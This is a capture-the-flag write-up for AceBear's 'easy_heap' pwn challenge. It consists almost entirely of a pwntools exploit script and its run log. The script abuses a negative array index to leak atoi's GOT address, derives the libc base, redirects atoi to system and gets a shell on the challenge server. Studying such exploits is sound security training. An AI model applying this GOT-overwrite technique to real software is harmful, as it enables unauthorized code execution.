CTFtime.org

easy_heap

by 8710xiq / PwnaSonic

Rating:

## === easy heap (Pwn: 44 Solves / 100 pt) ===

```
I use the following address.

0x804af80: 0x0804b000 0x00000002 0x00000060 0x00000014
^^^^^^^^^^^^
  (index = -72)
```

```
from pwn import *

#context(os='linux', arch='i386')
#context.log_level = 'debug'

BINARY = './easy_heap'
elf = ELF(BINARY)

atoi_got_addr = elf.got['atoi']

if len(sys.argv) > 1 and sys.argv[1] == 'r':
s = remote("easyheap.acebear.site", 3002)
libc = ELF("./easyheap_libc.so.6")
else:
s = process(BINARY)
libc = elf.libc

def Create(index, name):
s.recvuntil("Your choice: ")
s.sendline("1")
s.recvuntil("Index: ")
s.sendline(str(index))
s.recvuntil("Input this name: ")
s.sendline(name)

def Edit(index, name):
s.recvuntil("Your choice: ")
s.sendline("2")
s.recvuntil("Index: ")
s.sendline(str(index))
s.recvuntil("Input new name: ")
s.send(name)

def Delete(index):
s.recvuntil("Your choice: ")
s.sendline("3")
s.recvuntil("Index: ")
s.sendline(str(index))

def Show(index):
s.recvuntil("Your choice: ")
s.sendline("4")
s.recvuntil("Index: ")
s.sendline(str(index))

s.recvuntil("Give me your name: ")
s.sendline("1111")
s.recvuntil("Your age: ")
s.sendline("2222")

Create(1, "AAAA")
Delete(1)

Edit(-72, p32(atoi_got_addr))
Show(-40)
r = s.recv(0x1c)
atoi_addr = u32(r[0x12:0x16])
libc_base_addr = atoi_addr - libc.symbols['atoi']
system_addr = libc_base_addr + libc.symbols['system']

print "atoi_addr =", hex(atoi_addr)
print "libc_base_addr =", hex(libc_base_addr)
print "system_addr =", hex(system_addr)

Edit(-72, p32(atoi_got_addr))
Edit(-40, p32(system_addr))

s.recvuntil("Your choice: ")
s.sendline("/bin/sh")

s.interactive()
```

```
root@kali:# python exploit.py r
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Opening connection to easyheap.acebear.site on port 3002: Done
[*] 'Pwn_easy_heap/easyheap_libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
atoi_addr = 0xf7e37050
libc_base_addr = 0xf7e0a000
system_addr = 0xf7e44940
[*] Switching to interactive mode
$ id
uid=1000(easy_heap) gid=1000(easy_heap) groups=1000(easy_heap)
$ cd /home/easy_heap
$ cat flag
AceBear{m4yb3_h34p_i5_3a5y_f0r_y0u}
```

Comments